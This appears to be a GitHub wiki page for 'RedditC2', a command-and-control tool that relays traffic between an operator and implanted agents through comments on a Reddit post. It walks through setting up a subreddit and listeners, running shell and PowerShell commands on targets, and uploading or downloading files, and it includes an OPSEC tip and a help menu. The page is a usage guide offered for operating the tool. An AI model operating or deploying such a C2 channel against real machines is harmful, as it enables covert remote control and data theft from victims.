Skip to content

2. Teamserver usage

Jump to bottom
kleiton0x00 edited this page Jan 9, 2023 · 6 revisions

On this wiki page you will find the commands used to create/use listener as well as configuring the subreddit.

Setup a subreddit

You must manually create a subreddit (or use an existing one). For better OPSEC,it is recommended to create a fully Private repository. Then use the following command to use that subreddit in the C2 Server (In this case I have already created a subreddit named redditc2):

RedditC2> set subreddit redditc2
[*] Subreddit set to: redditc2

Setup a listener

Note: a listener means a Reddit Post. The agent and the teamserver will communicate with eachother by looking at the comments of the specific reddit post. To create a listener, use the command below ("the value of the listener can be anything unique"):

RedditC2> create listener myFirstListener

Once executed, a new Reddit Post will be created with the same post title as the one you set. image
WARNING: Once a listener is created, the Reddit Post will always stay there, so you don't need to create the same Reddit Post twice.

List listeners of a subreddit

List all the Reddit posts of the selected subreddit to use for hosting the C2 traffic:

RedditC2> list listeners
[+] redditc2_lounge
[+] myFirstListener

In our case, we will choose our newly created listener myFirstListener. Look at the command below for the next step.

Enter the session

The following command will enter the session, which means that you are now able to post/read comments within the created post, so you can start queueing tasks:

RedditC2> use listener myFirstListener
[+] Entered the session
myFirstListener>

Execute commands

For Windows/Linux agent: execute command using run <command> syntax:

myFirstListener> run whoami
[+] Command sent
[+] Received Output:
kleiton0x7e

For Windows agent: execute powershell command using powershell <command> syntax:

myFirstListener> powershell 2+2
[+] Command sent
[+] Received Output:
4

File download/upload

To upload file to the target instance:

upload /path/to/file

To download file from the target instance:

download /path/to/file

Note: Due to the Reddit API character limitation (up to 10000 characters per comment), the file size is very limited. If you exceed the file size limit, you will get notified with an error by the TeamServer with how much exactly characters you passed the limit.

For additional commands, type help:

RedditC2> help

set subreddit                    --> Select the subreddit where you will create the listener
list listeners                   --> List all listeners you can use within the subreddit
create listener [session number] --> Create a post in subreddit where the traffic will ocurr
use listener [session number]    --> Interact With Each Session Individually
run [command]                    --> Execute a cmd command
download [file_name]             --> Download a file from the target
upload [file_name]               --> Upload a file to the target
powershell [command]             --> Execute a powershell command
help                             --> Show the help menu
exit                             --> Exit from the session
clear                            --> Clear the screen

Clone this wiki locally